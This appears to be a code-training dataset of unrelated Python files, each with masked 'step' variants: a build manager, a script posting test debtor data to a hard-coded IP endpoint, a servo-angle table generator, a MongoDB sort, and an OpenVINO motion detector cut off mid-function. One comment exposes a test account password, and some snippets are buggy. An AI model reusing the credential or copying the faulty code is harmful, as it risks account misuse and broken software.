self.vfiles.close()\n\n#//===========================================================================//\n\nclass BuildManager (object):\n \n __slots__ = \\\n (\n '_nodes',\n '_built_targets',\n '_failed_nodes',\n '_built_node_names',\n 'completed',\n 'actual',\n 'explain',\n )\n \n #//-------------------------------------------------------//\n \n def __init__(self):\n self._nodes = _NodesTree()\n self.__reset()\n \n #//-------------------------------------------------------//\n \n def __reset(self, build_always = False, explain = False ):\n \n self._built_targets = {}\n self._failed_nodes = {}\n self._built_node_names = set() if build_always else None\n \n self.completed = 0\n self.actual = 0\n self.explain = explain\n \n #//-------------------------------------------------------//\n \n def add( self, nodes ):\n self._nodes.add( nodes )\n \n #//-------------------------------------------------------//\n \n def depends( self, node, deps ):\n self._nodes.depends( node, deps )\n \n #//-------------------------------------------------------//\n \n def __len__(self):\n return len(self._nodes)\n \n #//-------------------------------------------------------//\n \n def selfTest( self ):\n self._nodes.selfTest()\n \n #//-------------------------------------------------------//\n \n def getTailNodes(self):\n return self._nodes.popTails()\n \n #//-------------------------------------------------------//\n \n def actualNodeStatus( self, node ):\n eventNodeActual( node, self.getProgressStr() )\n self.actualNode( node )\n \n #//-------------------------------------------------------//\n \n def outdatedNodeStatus( self, node ):\n self._failed_nodes[ node ] = None\n \n eventNodeOutdated( node, self.getProgressStr() )\n node.shrink()\n \n #//-------------------------------------------------------//\n \n def isActualNode( self, node, vfile ):\n return node.checkActual( vfile, self._built_node_names, self.explain )\n \n #//-------------------------------------------------------//\n \n def _addToBuiltNodeNames(self, node ):\n built_names = self._built_node_names\n if built_names is not None:\n built_names.update( node.getNames() )\n \n #//-------------------------------------------------------//\n \n def completedSplitNode(self, node ):\n self._nodes.removeTail( node )\n node.shrink()\n \n #//-------------------------------------------------------//\n \n def actualNode( self, node ):\n self._nodes.removeTail( node )\n self.actual += 1\n \n node.shrink()\n \n #//-------------------------------------------------------//\n \n def completedNode( self, node, builder_output ):\n self._checkAlreadyBuilt( node )\n self._nodes.removeTail( node )\n self._addToBuiltNodeNames( node )\n \n self.completed += 1\n \n eventNodeBuildingFinished( node, builder_output, self.getProgressStr() )\n \n node.shrink()\n \n #//-------------------------------------------------------//\n \n def failedNode( self, node, error ):\n self._failed_nodes[ node ] = error\n \n eventNodeBuildingFailed( node, error )\n \n #//-------------------------------------------------------//\n \n def removedNode( self, node ):\n self._nodes.removeTail( node )\n self.completed += 1\n \n eventNodeRemoved( node, self.getProgressStr() )\n \n node.shrink()\n \n #//-------------------------------------------------------//\n \n def getProgressStr(self):\n done = self.completed + self.actual\n total = len(self._nodes) + done\n \n processed = done + len(self._failed_nodes)\n \n progress = \"%s/%s\" % (processed, total)\n return progress\n \n #//-------------------------------------------------------//\n \n def close( self ):\n self._nodes = _NodesTree()\n \n #//-------------------------------------------------------//\n \n def _checkAlreadyBuilt( self, node ):\n values = node.getTargetValues()\n \n built_targets = self._built_targets\n \n for value in values:\n value_sign = value.signature\n other_value_sign = built_targets.setdefault( value.valueId(), value_sign )\n \n if other_value_sign != value_sign:\n eventBuildTargetTwice( value, node )\n \n #//-------------------------------------------------------//\n \n def build( self, jobs, keep_going, nodes = None, build_always = False, explain = False, with_backtrace = True ):\n \n self.__reset( build_always = build_always, explain = explain )\n \n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo( nodes )\n \n with _NodesBuilder( self, jobs, keep_going, with_backtrace ) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n \n if not tails and not nodes_builder.isBuilding():\n break\n \n nodes_builder.build( tails )\n \n return self.isOk()\n \n #//-------------------------------------------------------//\n \n def isOk(self):\n return not bool( self._failed_nodes )\n \n #//-------------------------------------------------------//\n \n def failsCount(self):\n return len( self._failed_nodes )\n \n #//-------------------------------------------------------//\n \n def printFails(self ):\n for node, error in self._failed_nodes.items():\n eventFailedNode( node, error )\n \n #//-------------------------------------------------------//\n \n def printBuildState(self):\n logInfo(\"Failed nodes: %s\" % len(self._failed_nodes) )\n logInfo(\"Completed nodes: %s\" % self.completed )\n logInfo(\"Actual nodes: %s\" % self.actual )\n \n #//-------------------------------------------------------//\n \n def printStatusState(self):\n logInfo(\"Outdated nodes: %s\" % len(self._failed_nodes) )\n logInfo(\"Actual nodes: %s\" % self.actual )\n \n #//-------------------------------------------------------//\n \n def clear( self, nodes = None ):\n \n self.__reset()\n \n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo( nodes )\n \n with _NodesBuilder( self ) as nodes_builder:\n while True:\n \n tails = self.getTailNodes()\n \n if not tails:\n break\n \n nodes_builder.clear( tails )\n \n #//-------------------------------------------------------//\n \n def status( self, nodes = None, explain = False ):\n \n self.__reset( explain = explain )\n \n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo( nodes )\n \n with _NodesBuilder( self ) as nodes_builder:\n \n while True:\n tails = self.getTailNodes()\n \n if not tails:\n break\n \n nodes_builder.status( tails )\n \n return self.isOk()\n", "step-ids": [ 68, 84, 88, 95, 105 ] }
[ 68, 84, 88, 95, 105 ]
# -*- coding: utf-8 -*- import requests import json url = "http://39.108.188.34:9090/spider/zhongdengdengji.go" # url = "http://localhost:9090/spider/zhongdengdengji.go" input = { "timelimit": "1年", "title": "GD20190305001", "maincontractno": "YT20181228001", "maincontractcurrency": "人民币", "maincontractsum": "100000", "description": "Y0181228001测试供应商有限公司与测试项目有限公司就SW00002-20181226-1204,转让应收账款金额100000元T2,测试供应商有限公司已出具应收账款转让通知书,对应的发票号及金额为1111/50000,5555/50000,到期日2018-12-29。付款方万科企业股份有限公司已出具编号为ZB00002-20181226-1204的付款确认及授权书", "addDebtorList": [ { # 金融机构 "debtorType": "企业", "debtorName": "测试供应商有限公司", "orgCode": "9144030068375453XL", "businessCode": "9144030068375453XL", "lei": "#*¥#*(&¥#(*&¥()", "responsiblePerson": "测试法人1", "country": "中国", "province": "黑龙江省", "city": "哈尔滨市", "address": "北京天安门", } ] } data = json.dumps(input) headers = { 'User-Agent': 'User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36', "Content-Type": "application/json"} response = requests.post(url, data=data, headers=headers, timeout=(500, 500)) print(response.text) # testAccount = [{'account': 'ytbl0011', 'keyword': 'ytbl0011aDmin'}]
normal
{ "blob_id": "ad024a2001dc6a6fa3a2a9c1b51f79132e914897", "index": 7592, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(response.text)\n", "step-3": "<mask token>\nurl = 'http://39.108.188.34:9090/spider/zhongdengdengji.go'\ninput = {'timelimit': '1年', 'title': 'GD20190305001', 'maincontractno':\n 'YT20181228001', 'maincontractcurrency': '人民币', 'maincontractsum':\n '100000', 'description':\n 'Y0181228001测试供应商有限公司与测试项目有限公司就SW00002-20181226-1204,转让应收账款金额100000元T2,测试供应商有限公司已出具应收账款转让通知书,对应的发票号及金额为1111/50000,5555/50000,到期日2018-12-29。付款方万科企业股份有限公司已出具编号为ZB00002-20181226-1204的付款确认及授权书'\n , 'addDebtorList': [{'debtorType': '企业', 'debtorName': '测试供应商有限公司',\n 'orgCode': '9144030068375453XL', 'businessCode': '9144030068375453XL',\n 'lei': '#*¥#*(&¥#(*&¥()', 'responsiblePerson': '测试法人1', 'country': '中国',\n 'province': '黑龙江省', 'city': '哈尔滨市', 'address': '北京天安门'}]}\ndata = json.dumps(input)\nheaders = {'User-Agent':\n 'User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'\n , 'Content-Type': 'application/json'}\nresponse = requests.post(url, data=data, headers=headers, timeout=(500, 500))\nprint(response.text)\n", "step-4": "import requests\nimport json\nurl = 'http://39.108.188.34:9090/spider/zhongdengdengji.go'\ninput = {'timelimit': '1年', 'title': 'GD20190305001', 'maincontractno':\n 'YT20181228001', 'maincontractcurrency': '人民币', 'maincontractsum':\n '100000', 'description':\n 'Y0181228001测试供应商有限公司与测试项目有限公司就SW00002-20181226-1204,转让应收账款金额100000元T2,测试供应商有限公司已出具应收账款转让通知书,对应的发票号及金额为1111/50000,5555/50000,到期日2018-12-29。付款方万科企业股份有限公司已出具编号为ZB00002-20181226-1204的付款确认及授权书'\n , 'addDebtorList': [{'debtorType': '企业', 'debtorName': '测试供应商有限公司',\n 'orgCode': '9144030068375453XL', 'businessCode': '9144030068375453XL',\n 'lei': '#*¥#*(&¥#(*&¥()', 'responsiblePerson': '测试法人1', 'country': '中国',\n 'province': '黑龙江省', 'city': '哈尔滨市', 'address': '北京天安门'}]}\ndata = json.dumps(input)\nheaders = {'User-Agent':\n 'User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'\n , 'Content-Type': 'application/json'}\nresponse = requests.post(url, data=data, headers=headers, timeout=(500, 500))\nprint(response.text)\n", "step-5": "# -*- coding: utf-8 -*-\n\nimport requests\nimport json\n\nurl = \"http://39.108.188.34:9090/spider/zhongdengdengji.go\"\n# url = \"http://localhost:9090/spider/zhongdengdengji.go\"\n\ninput = {\n \"timelimit\": \"1年\",\n \"title\": \"GD20190305001\",\n \"maincontractno\": \"YT20181228001\",\n \"maincontractcurrency\": \"人民币\",\n \"maincontractsum\": \"100000\",\n \"description\": \"Y0181228001测试供应商有限公司与测试项目有限公司就SW00002-20181226-1204,转让应收账款金额100000元T2,测试供应商有限公司已出具应收账款转让通知书,对应的发票号及金额为1111/50000,5555/50000,到期日2018-12-29。付款方万科企业股份有限公司已出具编号为ZB00002-20181226-1204的付款确认及授权书\",\n \"addDebtorList\": [\n {\n # 金融机构\n \"debtorType\": \"企业\",\n \"debtorName\": \"测试供应商有限公司\",\n \"orgCode\": \"9144030068375453XL\",\n \"businessCode\": \"9144030068375453XL\",\n \"lei\": \"#*¥#*(&¥#(*&¥()\",\n \"responsiblePerson\": \"测试法人1\",\n \"country\": \"中国\",\n \"province\": \"黑龙江省\",\n \"city\": \"哈尔滨市\",\n \"address\": \"北京天安门\",\n }\n\n ]\n\n}\n\ndata = json.dumps(input)\n\nheaders = {\n 'User-Agent': 'User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\n \"Content-Type\": \"application/json\"}\nresponse = requests.post(url, data=data, headers=headers, timeout=(500, 500))\nprint(response.text)\n\n# testAccount = [{'account': 'ytbl0011', 'keyword': 'ytbl0011aDmin'}]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import pandas as pd import csv import numpy as np import matplotlib.pyplot as plt #import csv file with recorded left, right servo angles and their corresponding roll and pitch values df = pd.read_csv('C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv') #change address to csv file address #remove all the NaN rows df = df.apply (pd.to_numeric, errors='coerce') df = df.dropna() #scatter plot of all avaiable left and right servo angles plt.scatter(df['left_rel_angle'], df['right_rel_angle']) plt.xlabel('Left servo angle(deg)') plt.ylabel('Right servo angle(deg)') plt.title('Plot of left and right servo values') plt.show() #scatter plot of all avaiable roll and pitch angles plt.scatter(df['roll'], df['pitch']) plt.xlabel('Roll(deg)') plt.ylabel('Pitch(deg)') plt.title('Plot of roll and pitch values') plt.show() #change to integer df['roll'] = df['roll'].astype('int8') df['pitch'] = df['pitch'].astype('int8') #sort df by roll(ascending) and then pitch(ascending) df_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True) #group dataframe by roll and pitch values (i.e. collect the data sets with the same roll and pitch outputs) and calculate the mean for left and right servo values df_sorted = df.groupby(['pitch','roll']).mean().reset_index() #change left and right servo values to integer df_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8') df_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8') #group left and right servo value together into a tuple df_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']].apply(tuple, axis=1) #change table format to row index:pitch, column index: roll, create two tables with left and right servo angles df_sorted_left = df_sorted.pivot(index ='pitch', columns='roll', values='left_rel_angle') df_sorted_right = df_sorted.pivot(index ='pitch', columns='roll', values='right_rel_angle') #for every cell that is empty, write it a value of it's left or right most adjacent available cell df_sorted_left.bfill(axis ='columns', inplace = True) df_sorted_left.ffill(axis ='columns', inplace = True) df_sorted_right.bfill(axis ='columns', inplace = True) df_sorted_right.ffill(axis ='columns', inplace = True) #change table type to integer df_sorted_left = df_sorted_left.astype('int8') df_sorted_right = df_sorted_right.astype('int8') #save the left and right servo table files locally (debugging step) df_sorted_left.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/left_test.csv') df_sorted_right.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/right_test.csv') #create empty data table and row data = [] row = [] for i in range(-55,52): #for i in pitch range (rows); check the left_test.csv or right_test.csv file to find out the range of pitch values row = [] for j in range(-21, 23): #for j in roll range (column); check the left_test.csv or right_test.csv file to find out the range of pitch values tup = (df_sorted_left[j][i], df_sorted_right[j][i]) #create a tuple in the format of (left_serve_angle, right_servo_angle) # print(i,j) # print(tup) row.append(tup) #apend tuple to row data.append(row) #append row to data df_concat = pd.DataFrame(data=data) # df_concat = df_concat.applymap(str) df_concat = df_concat.astype(str) df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv') # df_concat = df_concat.str.replace('(','{') # df_concat = df_concat.str.replace(')','},') # df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/tabblepeggy_2_angle_reference_TEST.csv') ''' Run the next two lines after you open the csv file and edited the following: 1. change all "(" to "{" 2. change all ")" to "}" 3. delete the first column (index column) ''' # df_concat = pd.read_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv') # np.savetxt(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2deg_1.h', df_concat, fmt='%s', newline="}, \n {", header="#ifndef NECK_H_\n#define NECK_H_")
normal
{ "blob_id": "fd7961d3a94b53ae791da696bb2024165db8b8fc", "index": 5354, "step-1": "<mask token>\n", "step-2": "<mask token>\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\n<mask token>\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\n<mask token>\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\n<mask token>\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\n<mask token>\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n", "step-3": "<mask token>\ndf = pd.read_csv(\n 'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'\n )\ndf = df.apply(pd.to_numeric, errors='coerce')\ndf = df.dropna()\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\ndf['roll'] = df['roll'].astype('int8')\ndf['pitch'] = df['pitch'].astype('int8')\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\ndf_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']\n ].apply(tuple, axis=1)\ndf_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=\n 'left_rel_angle')\ndf_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=\n 'right_rel_angle')\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\ndf_sorted_left = df_sorted_left.astype('int8')\ndf_sorted_right = df_sorted_right.astype('int8')\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\ndata = []\nrow = []\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\ndf_concat = pd.DataFrame(data=data)\ndf_concat = df_concat.astype(str)\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n", "step-4": "import pandas as pd\nimport csv\nimport numpy as np\nimport matplotlib.pyplot as plt\ndf = pd.read_csv(\n 'C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv'\n )\ndf = df.apply(pd.to_numeric, errors='coerce')\ndf = df.dropna()\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\nplt.xlabel('Left servo angle(deg)')\nplt.ylabel('Right servo angle(deg)')\nplt.title('Plot of left and right servo values')\nplt.show()\nplt.scatter(df['roll'], df['pitch'])\nplt.xlabel('Roll(deg)')\nplt.ylabel('Pitch(deg)')\nplt.title('Plot of roll and pitch values')\nplt.show()\ndf['roll'] = df['roll'].astype('int8')\ndf['pitch'] = df['pitch'].astype('int8')\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\ndf_sorted = df.groupby(['pitch', 'roll']).mean().reset_index()\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']\n ].apply(tuple, axis=1)\ndf_sorted_left = df_sorted.pivot(index='pitch', columns='roll', values=\n 'left_rel_angle')\ndf_sorted_right = df_sorted.pivot(index='pitch', columns='roll', values=\n 'right_rel_angle')\ndf_sorted_left.bfill(axis='columns', inplace=True)\ndf_sorted_left.ffill(axis='columns', inplace=True)\ndf_sorted_right.bfill(axis='columns', inplace=True)\ndf_sorted_right.ffill(axis='columns', inplace=True)\ndf_sorted_left = df_sorted_left.astype('int8')\ndf_sorted_right = df_sorted_right.astype('int8')\ndf_sorted_left.to_csv('C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\ndf_sorted_right.to_csv('C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\ndata = []\nrow = []\nfor i in range(-55, 52):\n row = []\n for j in range(-21, 23):\n tup = df_sorted_left[j][i], df_sorted_right[j][i]\n row.append(tup)\n data.append(row)\ndf_concat = pd.DataFrame(data=data)\ndf_concat = df_concat.astype(str)\ndf_concat.to_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\n<mask token>\n", "step-5": "import pandas as pd\r\nimport csv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#import csv file with recorded left, right servo angles and their corresponding roll and pitch values\r\ndf = pd.read_csv('C:/Users/yuyan.shi/Desktop/work/head-neck/kinematics/tabblepeggy reference tables/mid_servo_angle_2deg_3.csv') #change address to csv file address\r\n\r\n#remove all the NaN rows\r\ndf = df.apply (pd.to_numeric, errors='coerce')\r\ndf = df.dropna()\r\n\r\n#scatter plot of all avaiable left and right servo angles\r\nplt.scatter(df['left_rel_angle'], df['right_rel_angle'])\r\nplt.xlabel('Left servo angle(deg)')\r\nplt.ylabel('Right servo angle(deg)')\r\nplt.title('Plot of left and right servo values')\r\nplt.show()\r\n\r\n#scatter plot of all avaiable roll and pitch angles\r\nplt.scatter(df['roll'], df['pitch'])\r\nplt.xlabel('Roll(deg)')\r\nplt.ylabel('Pitch(deg)')\r\nplt.title('Plot of roll and pitch values')\r\nplt.show()\r\n\r\n#change to integer\t\r\ndf['roll'] = df['roll'].astype('int8')\r\ndf['pitch'] = df['pitch'].astype('int8')\r\n\r\n#sort df by roll(ascending) and then pitch(ascending) \r\ndf_sorted = df.sort_values(by=['roll', 'pitch']).reset_index(drop=True)\r\n\r\n#group dataframe by roll and pitch values (i.e. collect the data sets with the same roll and pitch outputs) and calculate the mean for left and right servo values\r\ndf_sorted = df.groupby(['pitch','roll']).mean().reset_index()\r\n\r\n#change left and right servo values to integer\r\ndf_sorted['left_rel_angle'] = df_sorted['left_rel_angle'].astype('int8')\r\ndf_sorted['right_rel_angle'] = df_sorted['right_rel_angle'].astype('int8')\r\n\r\n#group left and right servo value together into a tuple\r\ndf_sorted['servo_angles'] = df_sorted[['left_rel_angle', 'right_rel_angle']].apply(tuple, axis=1)\r\n\r\n#change table format to row index:pitch, column index: roll, create two tables with left and right servo angles\r\ndf_sorted_left = df_sorted.pivot(index ='pitch', columns='roll', values='left_rel_angle')\r\ndf_sorted_right = df_sorted.pivot(index ='pitch', columns='roll', values='right_rel_angle')\r\n\r\n#for every cell that is empty, write it a value of it's left or right most adjacent available cell\r\ndf_sorted_left.bfill(axis ='columns', inplace = True)\r\ndf_sorted_left.ffill(axis ='columns', inplace = True)\r\ndf_sorted_right.bfill(axis ='columns', inplace = True)\r\ndf_sorted_right.ffill(axis ='columns', inplace = True)\r\n\r\n#change table type to integer\r\ndf_sorted_left = df_sorted_left.astype('int8')\r\ndf_sorted_right = df_sorted_right.astype('int8') \r\n\r\n#save the left and right servo table files locally (debugging step)\r\ndf_sorted_left.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/left_test.csv')\r\ndf_sorted_right.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/right_test.csv')\r\n\r\n#create empty data table and row \r\ndata = []\r\nrow = []\r\n\r\nfor i in range(-55,52): #for i in pitch range (rows); check the left_test.csv or right_test.csv file to find out the range of pitch values \r\n\trow = []\r\n\tfor j in range(-21, 23): #for j in roll range (column); check the left_test.csv or right_test.csv file to find out the range of pitch values\r\n\t\ttup = (df_sorted_left[j][i], df_sorted_right[j][i]) #create a tuple in the format of (left_serve_angle, right_servo_angle)\r\n\t\t# print(i,j)\r\n\t\t# print(tup)\r\n\t\trow.append(tup) #apend tuple to row\r\n\tdata.append(row) #append row to data\r\n\r\ndf_concat = pd.DataFrame(data=data)\r\n# df_concat = df_concat.applymap(str)\r\ndf_concat = df_concat.astype(str)\r\ndf_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\r\n\r\n# df_concat = df_concat.str.replace('(','{')\r\n# df_concat = df_concat.str.replace(')','},')\r\n# df_concat.to_csv (r'C:/Users/yuyan.shi/Desktop/test files/tabblepeggy_2_angle_reference_TEST.csv')\r\n\r\n'''\r\nRun the next two lines after you open the csv file and edited the following:\r\n1. change all \"(\" to \"{\"\r\n2. change all \")\" to \"}\"\r\n3. delete the first column (index column) \r\n'''\r\n# df_concat = pd.read_csv('C:/Users/yuyan.shi/Desktop/test files/mid_servo_2.csv')\r\n# np.savetxt(r'C:/Users/yuyan.shi/Desktop/test files/mid_servo_2deg_1.h', df_concat, fmt='%s', newline=\"}, \\n {\", header=\"#ifndef NECK_H_\\n#define NECK_H_\")\r\n\r\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# 14. Sort dataframe (birds) first by the values in the 'age' in decending order, then by the value in the 'visits' column in ascending order. import pymongo myclient = pymongo.MongoClient("mongodb://localhost:27017/") mydb = myclient["divya_db"] mycol = mydb["vani_data"] # age column in decending order myquery = mycol.find().sort("age",-1) print(list(myquery)) # visits column in ascending order myquery = mycol.find().sort("visits",1) print(list(myquery))
normal
{ "blob_id": "d91bacfd4b45832a79189c0f1ec4f4cb3ef14851", "index": 2210, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(list(myquery))\n<mask token>\nprint(list(myquery))\n", "step-3": "<mask token>\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['divya_db']\nmycol = mydb['vani_data']\nmyquery = mycol.find().sort('age', -1)\nprint(list(myquery))\nmyquery = mycol.find().sort('visits', 1)\nprint(list(myquery))\n", "step-4": "import pymongo\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['divya_db']\nmycol = mydb['vani_data']\nmyquery = mycol.find().sort('age', -1)\nprint(list(myquery))\nmyquery = mycol.find().sort('visits', 1)\nprint(list(myquery))\n", "step-5": "# 14. Sort dataframe (birds) first by the values in the 'age' in decending order, then by the value in the 'visits' column in ascending order.\n\nimport pymongo\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\") \nmydb = myclient[\"divya_db\"]\nmycol = mydb[\"vani_data\"]\n\n# age column in decending order\nmyquery = mycol.find().sort(\"age\",-1)\nprint(list(myquery))\n\n# visits column in ascending order\nmyquery = mycol.find().sort(\"visits\",1)\nprint(list(myquery))\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#This is just a test print("this is something new") for a in range(10): print(sum(a)) print("the loop worked")
normal
{ "blob_id": "df317e914073f5b236f73b616b87f86ae378ef38", "index": 8755, "step-1": "<mask token>\n", "step-2": "print('this is something new')\nfor a in range(10):\n print(sum(a))\nprint('the loop worked')\n", "step-3": "#This is just a test\nprint(\"this is something new\")\nfor a in range(10):\n print(sum(a))\nprint(\"the loop worked\")\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
A, B = map(int, input().split()) K = (B ** 2 - A ** 2) / (2 * A - 2 * B) print(int(abs(K))) if K.is_integer() else print('IMPOSSIBLE')
normal
{ "blob_id": "36a7d3ed28348e56e54ce4bfa937363a64ee718f", "index": 6981, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(int(abs(K))) if K.is_integer() else print('IMPOSSIBLE')\n", "step-3": "A, B = map(int, input().split())\nK = (B ** 2 - A ** 2) / (2 * A - 2 * B)\nprint(int(abs(K))) if K.is_integer() else print('IMPOSSIBLE')\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
from openvino.inference_engine import IENetwork, IECore import numpy as np import time from datetime import datetime import sys import os import cv2 class MotionDetect: # Klasse zur Erkennung von Bewegung def __init__(self): self.static_back = None def detect_motion(self, frame, reset=False): gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) gray = cv2.GaussianBlur(gray, (21, 21), 0) if self.static_back is None or reset: self.static_back = gray return False diff_frame = cv2.absdiff(self.static_back, gray) thresh_frame = cv2.threshold(diff_frame, 50, 255, cv2.THRESH_BINARY)[1] thresh_frame = cv2.dilate(thresh_frame, None, iterations=2) cnts, _ = cv2.findContours(thresh_frame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) if cnts: return True else: return False def reset_background(self): self.static_back = None class InferenceModel: # Klasse zur Erstellung eines 'ExecInferModel' Objekts def __init__(self, device='MYRIAD'): self.ie = IECore() self.device = device def create_exec_infer_model(self, model_dir, output_dir, num_requests=2): # Anlegen der Pfade zu den Modell Dateien model_xml = os.path.join( model_dir, 'frozen_inference_graph.xml') model_bin = os.path.join( model_dir, 'frozen_inference_graph.bin') exported_model = os.path.join(model_dir, 'exported_model') # Laden der Labels aus 'classes.txt' labels = [line.strip() for line in open( os.path.join(model_dir, 'classes.txt')).readlines()] assert os.path.isfile(model_bin) assert os.path.isfile(model_xml) # Erstellung des Modells aus IR Dateien net = IENetwork(model=model_xml, weights=model_bin) # In-Output Shapes des Modells aus 'net' laden img_info_input_blob = None feed_dict = {} for blob_name in net.inputs: if len(net.inputs[blob_name].shape) == 4: input_blob = blob_name elif len(net.inputs[blob_name].shape) == 2: img_info_input_blob = blob_name else: raise RuntimeError("Unsupported {}D input layer '{}'. Only 2D and 4D input layers are supported" .format(len(net.inputs[blob_name].shape), blob_name)) assert len( net.outputs) == 1, "Demo supports only single output topologies" out_blob = next(iter(net.outputs)) # Modell importieren (Falls vorhanden) if os.path.isfile(exported_model): print('found model to import') try: exec_net = self.ie.import_network( model_file=exported_model, device_name=self.device, num_requests=num_requests) except: return False else: # sonst erstellen und exoportieren print('creating exec model') try: exec_net = self.ie.load_network( network=net, num_requests=num_requests, device_name=self.device) exec_net.export(exported_model) except: return False nchw = net.inputs[input_blob].shape del net if img_info_input_blob: feed_dict[img_info_input_blob] = [nchw[2], nchw[3], 1] # ersellen und zurückgeben eines ExecInferModel Objekts, mit welchem die Inferenz ausgeführt wird return ExecInferModel(exec_net, input_blob, out_blob, feed_dict, nchw, labels, output_dir) class ExecInferModel: def __init__(self, exec_net, input_blob, out_blob, feed_dict, nchw, labels, output_dir): self.exec_net = exec_net self.labels = labels self.input_blob = input_blob self.out_blob = out_blob self.feed_dict = feed_dict self.n, self.c, self.h, self.w = nchw self.current_frames = {} self.detected_objects = {} self.output_dir = output_dir def infer_frames(self, buffer, threshhold=0.6, view_result=True, n_save=20, 